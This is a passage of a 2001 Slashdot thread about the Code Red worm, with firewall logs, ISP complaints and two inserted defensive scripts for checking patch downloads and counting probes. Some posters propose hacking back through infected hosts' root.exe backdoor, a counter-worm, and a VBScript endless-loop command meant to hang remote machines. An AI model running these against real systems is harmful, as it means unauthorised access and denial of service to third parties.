    -00:36:27 Unrecognized access from 24.252.165.173:2976 to TCP port 80
    -00:30:57 Unrecognized access from 24.252.222.104:3215 to TCP port 80
    -00:30:55 Unrecognized access from 24.252.222.104:3215 to TCP port 80
    -00:30:49 Unrecognized access from 24.252.222.104:3215 to TCP port 80
    -00:25:34 Unrecognized access from 24.252.222.104:3822 to TCP port 80
    -00:25:31 Unrecognized access from 24.252.222.104:3822 to TCP port 80
    -00:25:25 Unrecognized access from 24.252.222.104:3822 to TCP port 80
    -00:25:10 Unrecognized access from 24.94.116.61:2962 to TCP port 80
    -00:25:07 Unrecognized access from 24.94.116.61:2962 to TCP port 80
    -00:25:00 Unrecognized access from 24.94.116.61:2962 to TCP port 80
    -00:22:50 Unrecognized access from 24.252.222.104:4245 to TCP port 80
    -00:22:15 Unrecognized access from 24.252.16.129:1302 to TCP port 80
    -00:22:12 Unrecognized access from 24.252.16.129:1302 to TCP port 80
    -00:22:06 Unrecognized access from 24.252.16.129:1302 to TCP port 80
    -00:19:14 Unrecognized access from 24.252.74.143:4835 to TCP port 80
    -00:19:11 Unrecognized access from 24.252.74.143:4835 to TCP port 80
    -00:19:05 Unrecognized access from 24.252.74.143:4835 to TCP port 80

    This has been going on non stop since Sunday. 'nuf said.

  245. My naive suggestion... by Bigboote66 · · Score: 1

    Since Code Red's damage seems to be primarily a function of its ability to spread, why not treat it the way we attack some diseases/pests: destroy its ability to reproduce.

    Why doesn't someone write a Code Red anti-worm - it spreads via the same mechanism as does Code Red, but once it has infected a machine, it uses its root privileges to close the door behind itself, then deletes itself. It could even send mail to the administrator of the machine indicating the fact.

    -BbT

  246. Who's going to own up to something like this? by h0tb0x · · Score: 1

    Surely the person who was savvy enough to write this understands the level of breach this is. To hijack probably more than a quarter million servers worldwide has got to be one heck of a jail sentence.

    --
    The phone, the bane of my existance, rings. "Hello, Computer Room" I say, being helpful - BOFH
  247. Microsoft is behind it by pyite · · Score: 1

    Warning: the following is all tongue in cheek. It's so obvious that Microsoft intentionally put this bug in and created Code Red themselves. By seeing how much the worm spread, they could see how many IIS machines were out there and thereby discover how many copies of Windows have been pirated. And they thought they had us... hahaha

    --

    "Nature doesn't care how smart you are. You can still be wrong." - Richard Feynman

  248. Pardon? by CTboy · · Score: 1

    I don't know if it works, I don't have a Win boxes to test it on...

    I must have missed the sarcasm or humor there, or something.

    The phrase, a Win boxes, is wrong under any variation of English grammar that I've ever seen. Though being the "grammar fascist" maybe you know some grammar secret the rest of us don't? Please enlighten. Or maybe that was a poor attempt at sarcasm. I feel silly pointing out something so obvious.

    1. Re:Pardon? by grammar+fascist · · Score: 1

      *laughs hysterically*

      Okay, I think I've been missing out on too much sleep. You may dock my final score if you wish.

      --
      I got my Linux laptop at System76.
  249. medium damage by drew · · Score: 1

    obviously it's classified as medium damage because it can only infect iis servers.

    big whoop....

    --
    If I don't put anything here, will anyone recognize me anymore?
  250. merchandising. by saintlupus · · Score: 1

    OpenBSD. AKA The Jimmy Hat OS.

    i want the t-shirt. preferably with the blowfish trying to swim out the end of a trojan.

    tee hee.

    --saint
  251. However, it is not remote root by Oestergaard · · Score: 2, Informative

    Slashdot is currently fucking up my submissions, claiming junk character posts, duplicate posts 22000 hours ago and what not. Sorry if this appears twice somewhere...

    On to what I wanted to say:
    While the executable is called root.exe, it's far from a remote root.

    "Unfortunately" (well, if you want to do anything with root.exe at least), recent IIS versions are running as some IIS user with very few privileges. It did use to run as "system" (meaning - more power than the administrator), but it doesn't anymore.

    My attempts at shutting down machines attacking my Apache box by running various "net stop" commands etc. were futile. The IIS user simply doesn't have the privileges to shut down the system.

    I suspect one could create the equivalent of a fork bomb in a very minimal executable - then write the executable to the remote machine in a number of HTTP requests, and finally get the attacker to stop simply by executing the fork bomb.

    But I haven't gotten around to trying this just yet :) Things would have been so much easier if this was indeed remote root.

    1. Re:However, it is not remote root by Oestergaard · · Score: 2

      How about executing the following first:

      echo "do while 1 = 1 loop" > do.vbs

      and then executing do.vbs a very large number of times ?

      Actually - I just executed it *ONCE* as normal user, and because VBScript runs in the scripting host I was unable to terminate the job myself.

      Now, attempting to log in as administrator just hangs in the login dialog... Other sessions to the terminal server are still running normally.

      Very interesting :)

      Unfortunately VBScript does not allow for the creation of a fork bomb as I hoped - suggestions anyone ? The noble goal being to stop remote machines from attacking my poor Apache box by using their pre-installed root.exe "administration interface".

      It is of course important that the administrative workaround for the broken boxes is not destructive. A reboot and hotfix must bring the box back to life - it's evil (although tempting at times) to break stuff beyond repair.

  252. Useless use of cat by winnetou · · Score: 1

    You might have more chance to get hired if you changed
    cat file | grep pattern
    into
    grep pattern file

  253. Gee by Anonymous Coward · · Score: 0

    Wow, that virus hasn't got to LDAP / Microsoft Active Directory and changed people's passwords yet.

  254. Re:mediaone EUA ALLOWS FTP AND HTTP SERVERS by NullPointer · · Score: 1

    I sorta read that the same way, unfortunately it is contradicted by the AUP which says:

    Examples of prohibited uses include, but are not limited to, running servers for mail, http, ftp, irc, and dhcp, and multi-user interactive forums.

    Also, you'll find a Q&A that says:

    AT&T Broadband does not allow servers to be connected to the cable modem. This means that no computer in a personal network can be used as a server.

    They also say in their AUP that they don't spy on their customers and don't go out of their way to catch people. Essentially, if you're running a server that is *not* causing bandwidth problems for your neighbors, they won't come after you.

    --
    NULL
  255. Cable modem MIBs by Anonymous Coward · · Score: 1, Informative
    I've posted the MIBs here: http://a-docsis.tripod.com/

    I had to modify them for my modem, as docsDev appears in the "experimental" group, rather than the proper location. Install all 4 files in your mibs directory, and you should be able to deal with any modem.

    On my modem, the raw OID is ".1.3.6.1.3.83.1.6.4.1.2.1". The proper OID is ".1.3.6.1.2.1.69.1.6.4.1.2.1" (the last digit changes of course). If one doesn't work, try the other. From now on, I'll just post the OID that works for my modem, you may need to modify it.

    The integer value ".1.3.6.1.3.83.1.6.3.0" controls the default action, with 2 being "accept". If your ISP was using a drop-by-default policy, removing the firewall rules would disable your internet connection (so snmpset it to "2" first). But I don't think any ISP firewalls that strictly.

    The 1.3.6.1.3.83.1.2.1.[x].[rulenum] table controls SNMP access. If you know how to read an MIB, you can use this to change access settings (i.e. set community strings, or restrict by IP). To find your community strings, if they are not the default strings, you can download your modem's config file through TFTP. Sniff some DHCP requests to find the server's address, and the filename. You might need to set your IP to one in the 10.x.x.x block while downloading the file (you can also get a copy of your modem's firmware this way).

    For anyone who thinks this info might help you uncap your modem - you're wrong. I've tried modifying every value related to speed limits, including adding new QOS tables. Nothing works (well, maybe if you hack the firmware, and convince your modem to take your "updated" version...). It's the most well-protected setting in the modem. However, you can READ the cap settings - so when your ISP says "we're 100x faster than a 56k modem", you'll have proof they are lying. 2048 kbit isn't even 100x faster than a 28.8 modem...

    You can also use MRTG to graph your modem's bandwidth usage, which is pretty interesting. And you can graph things like the signal-to-noise ratio, transmit/receive power levels, error rates, etc.

  256. Well by savrinor · · Score: 1
    I'm an @home user, and even though running servers is against the TOS for basic @home cable modem, I strongly oppose any measures at blocking port 80 outright. Why? Because I, like a number of people, am using tools to log the code red attempts that come into my machine, and I send my logs to DShield.org. This is important, I believe, for tracking the progress and severity of the worm.

    As somebody suggested for Road Runner, the ISPs should scan for vulnerable IIS servers specifically, and block THEM. @Home certainly has the ability... My logs show dozens of scans and security checks by them every day, so a Code Red-oriented scan probably wouldn't be much more of a stretch for their security systems.

    Just my 2 cents.

  257. My solution to the remote root issue by gamorck · · Score: 0

    Actually the IIS Anonymous user (by default has guest access only) CAN shut down the machine. I've developed a script - though it's not fully functioning yet outside my test environment - that will detect a Code Red attack and immediately strike back by using root.exe to upload several files using tftp.

    These files are used in an attempt to automatically patch the server and remove the security holes left by Code Red.

    Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of which work in my internal network between different machines) - but I can't quite get them to work on the machines on the web.

    It may be because of the increased security of NTFS. As my routines are only designed to work with security-lax FAT formatted systems - that may be part of it.

    Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop....

    Gam
    "Flame at Will"

    --
    I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  258. My Solution by gamorck · · Score: 0

    Yeah I wrote something - its a set of scripts that work with IIS. I have a web app that will parse through IIS logs and dump a report back to you with a nice little graph.

    I've developed a script - though it's not fully functioning yet outside my test environment - that will detect a Code Red attack and immediately strike back by using root.exe to upload several files using tftp.

    These files are used in an attempt to automatically patch the server and remove the security holes left by Code Red.

    Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of which work in my internal network between different machines) - but I can't quite get them to work on the machines on the web.

    It may be because of the increased security of NTFS. As my routines are only designed to work with security-lax FAT formatted systems - that may be part of it.

    Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop.... and I do not believe it will until somebody writes a worm like code red that patches the servers instead of opening them up.

    Gam
    "Flame at Will"

    --
    I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  259. MS Problems Cause Patch Failures by SEWilco · · Score: 1
    A recent issue of RISKS Digest pointed out that the site with the patch to fix this IIS problem has problems itself. FTP downloads of the patch are often being disconnected, resulting in receipt of only a partial patch file.

    This partial patch file can be "run" without any error messages popping up, causing some admins to erroneously believe that they've applied a patch.

    The only indication that something went wrong is if the window with file size is visible, and if the person doing the download notices that the amount of data is less than the size of the file to be downloaded.
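SEWilco's RISKS item above (259) describes a failure mode that can be checked mechanically rather than by watching a progress window: compare the bytes received with the length the server declared, and compare a digest of the file with a value obtained out of band (the bulletin page, or a known-good copy) before running anything. The following is an added example for this page, not Microsoft's tooling; the sample bytes are a constructed stand-in for an executable, and the URL and digest in the `__main__` section are placeholders.

```python
"""Refuse to run a hotfix whose download was cut short: compare what arrived
with what the server declared and with a digest obtained out of band."""
import hashlib
import urllib.request


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_payload(data: bytes, declared_length, expected_sha256: str) -> tuple:
    """(ok, reason). A file is accepted only if its length matches the declared
    Content-Length (when one was sent) and its SHA-256 matches the expected value.
    A truncated self-extracting hotfix may still 'run' quietly, so the length check
    alone is not enough; the digest is what proves you got the right bytes."""
    if declared_length is not None and len(data) != declared_length:
        return False, f"short read: {len(data)} of {declared_length} bytes"
    digest = sha256_hex(data)
    if digest != expected_sha256.strip().lower():
        return False, f"digest mismatch: got {digest}"
    return True, "ok"


def download_verified(url: str, expected_sha256: str, dest: str, timeout: float = 120.0) -> int:
    """Fetch url, verify, and only then write dest. Returns the byte count written.
    Raises RuntimeError instead of leaving a partial file on disk for someone to run."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        declared = resp.headers.get("Content-Length")   # absent for some FTP servers
        declared = int(declared) if declared is not None else None
        data = resp.read()
    ok, reason = verify_payload(data, declared, expected_sha256)
    if not ok:
        raise RuntimeError(f"{url}: {reason}; nothing written")
    with open(dest, "wb") as f:
        f.write(data)
    return len(data)


# Constructed stand-in for a downloaded executable (an MZ header and padding), not a real patch.
SAMPLE_FILE = b"MZ" + bytes(range(256)) * 4
SAMPLE_SHA256 = sha256_hex(SAMPLE_FILE)

if __name__ == "__main__":
    # Placeholder URL and digest: substitute the bulletin's download link and a
    # digest you obtained independently (e.g. from a known-good copy).
    PATCH_URL = "https://example.invalid/patch.exe"
    EXPECTED = "0000000000000000000000000000000000000000000000000000000000000000"
    print(download_verified(PATCH_URL, EXPECTED, "hotfix.exe"))
```

The length check catches the dropped-FTP-connection case from the RISKS item on its own; the digest check is what catches a download that is complete but not the file you think it is, which is the case that matters once patches start being mirrored and mailed around.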

  260. Re:Well... by RedX · · Score: 2
    i had it run "start http://my.ip.address:666", and my firewall detected access from the infected IP, on port 666.. so it did open their browser.

    Perhaps we can run this command to open the link to the IIS patch for these idiots. I couldn't fight the curiosity any longer, so I installed a webserver on my box just to watch the logs, and I've gotten well over 100 hits in the past hour and have found quite a few of my fellow RR members have been r00ted. Now if only I could figure out how to embed useful commands in the HTML so I can try to help some of these folks out.

  261. That's Innovation! by Anonymous Coward · · Score: 0

    You hadn't noticed that Microsoft innovated a whole virus industry? There are several companies which get a lot of money providing anti-virus solutions. Ever since the early days of MS-DOS, virus capabilities have been mandated in the DOS standard. That's innovation!

  262. Lazy vs. Stupid by Ratbert42 · · Score: 2, Insightful

    Something's been bothering me about all the people criticizing the IIS admins for being too lazy to apply a month-old patch. Personally, I admin an IIS server that didn't have the patch applied, but Code Red didn't affect it. Why not? Because when I set up IIS in the first place I followed the security checklist. Unmapping .ida and other unused server extensions was right there on the list. Any decent Microsoft weenie should have done the same. If you're not stupid in the first place, sometimes you can get away with being lazy.

  263. What a waste by kahnmatt · · Score: 1

    With all of the viruses going around, it makes me stop and wonder why there aren't more freeware projects going on. Obviously someone has the time and talent to write a decent program (a malicious program could just as easily be legitimate). And obviously, they've decided to give it away to the world for free. So where's my free FTP/SCP/Telnet/SSH/Web browser?!

  264. Re:My 'Data' Light has been going steady since Fri by Anonymous Coward · · Score: 0

    It does on mine.

  265. Re:My 'Data' Light has been going steady since Fri by cos(0) · · Score: 1

    I did buy a full version of Windows 2000 Professional, because there are some Windows programs I like that aren't available on Linux/UNIX. Fortunately, I opted out of installing IIS -- the only Web server I run is Apache on my FreeBSD machine.

  266. @home to cancel accounts of infected users by Anonymous Coward · · Score: 0

    A friend of mine worked his way through online support for @home and managed to talk to a manager. Apparently, their plan is to axe the accounts of the infected users. "They aren't supposed to be running servers anyway". I can see them doing this if it goes on much longer. The HTTP hits are much less today on the 24.x.x.x.

  267. "Advanced Network Security Training" by Tony-A · · Score: 1

    Hmmm, does the MCSE cover installing patches?
    At least microsoft.com now mentions Code Red II on its home page: "New variant. Download the patch now to protect your network."
    Somehow I think I want to stay far, far away from .NET.

  268. Yes, I know it's inelegant... but there's a reason by BigBlockMopar · · Score: 2

    You might have more chance to get hired if you changed
    cat file | grep pattern
    into
    grep pattern file

    [grin] That's actually what it's running; I'm not crazy and I don't want to melt down my server with the extra command and the pipe overhead. I took a little ...uhh... artistic license and used cat and then grep on the page because, based on the number of Slashdot visitors who are still running Windows, it seems more self-explanatory.

    My reasoning? I don't know what percentage of those people are actually running Linux/UNIX servers. Most UNIX newbies could figure out what the cat does, and the pipe is the same as from DOS. And then, in that context, I don't think it would take a rocket scientist to see what grep does. However, grep on its own would look a little unclear.

    My focus group was my two roommates, both reasonably conversant with Windows and DOS (one of them has an original copy of DOS 3.3 still sealed in the box), no previous experience with UNIX of any sort, or the allegedly mind-blowing command prompts. The closest they've ever come to a shell is configuring a POP mail client. [grin]

    Yes, it appears to be inelegant. On one hand, the display version is in the very traditional UNIX model of a small, specialized and portable tool for each task, so in that sense, it's the preferable way, it's elegant in context. But, anyone who has ever written a script and watched top would cringe at it because it's a brute-force programming technique, almost as bad as a bubble sort. I don't claim to be a programmer, let alone an inspired one, but I certainly value efficiency.

    Okay, am I out to lunch? Does it work? I thought it through; after all, this is a first impression of me. Maybe I'll put a link off it with an explanation of why I chose to display the command that way.

    --
    Fire and Meat. Yummy.

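    As an added example (not from the thread or any poster): a short shell script in the spirit of the grep-only form above, run against a web server log to count Code Red probes per source address. It assumes the Sambar-style log layout quoted earlier in the thread (source address in the fourth whitespace-separated field, request path in quotes); the log lines and 10.0.0.x addresses are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the thread. Counts Code Red probes
# (requests for /default.ida) per source address in a web log.
# Assumed layout (matches the Sambar sample quoted in the thread):
#   [date tz] host source-ip "" METHOD status "/path" "query" ...
# so the source address is field 4. Sample lines are constructed.

LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT
cat > "$LOG" <<'EOF'
[08/Aug/2001:06:00:49 -0400] myhost 10.0.0.5 "" GET 404 "/default.ida" "XXXX%u9090%" 0 "-" "-"
[08/Aug/2001:06:01:12 -0400] myhost 10.0.0.9 "" GET 200 "/index.html" "" 0 "-" "-"
[08/Aug/2001:06:02:03 -0400] myhost 10.0.0.5 "" GET 404 "/default.ida" "XXXX%u9090%" 0 "-" "-"
[08/Aug/2001:06:03:40 -0400] myhost 10.0.0.7 "" GET 404 "/default.ida" "XXXX%u9090%" 0 "-" "-"
EOF

# Total number of probe requests in the log. grep reads the file
# directly: no cat, no pipe, no extra process.
codered_probe_count() {
    grep -c -F '"/default.ida"' "$1"
}

# "count address" for every source that sent a probe, busiest first.
# Fixed-string match (-F) so the path is not treated as a regex.
codered_sources() {
    grep -F '"/default.ida"' "$1" | awk '{print $4}' | sort | uniq -c | sort -rn
}

# Stand-alone usage: summarize the constructed log.
echo "probes: $(codered_probe_count "$LOG")"
codered_sources "$LOG"
```

    Point the two functions at a real log path instead of `$LOG` to get the list of addresses on your own provider's network that are still scanning; the busiest entries at the top are the hosts most worth reporting to the provider's abuse desk.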
  269. Code Red and Cable by Vskye · · Score: 1

    Right now I get hit about 40-70 times per hour with this. Thank god for Linux and iptables. :-) Funny thing is, most of the hits are from my cable providers network. Anyone want a retail box of NT 4.0 workstation? hehe...

    --
    Life was hell, then I discovered Linux...

  270. AT&T Broadband in SERIOUS trouble. by Fizzlewhiff · · Score: 1

    I live in Jacksonville, FL and each night on the local news they report AT&T's customer service reports. The service (both cable and internet) is so bad the city even has a page to help people get their problems resolved.

    Two weeks ago AT&T decided to drop the jacksonville.net domain we all use for our email. I complained about it and was told I should pay a business rate if I wanted a guaranteed email address. They've since turned the domain back on. It amazes me that AT&T lets their new acquisitions get away with such bad service.

    On the bright side, this has allowed DSS retailers and DSL resellers to make a mint offering alternatives. In fact, AT&T has been hurt so bad they are fighting the city's requests to have access to their customer service reports. Now if they would only put the time they spend fighting city hall into fixing service problems...

    --

    'Same speed C but faster'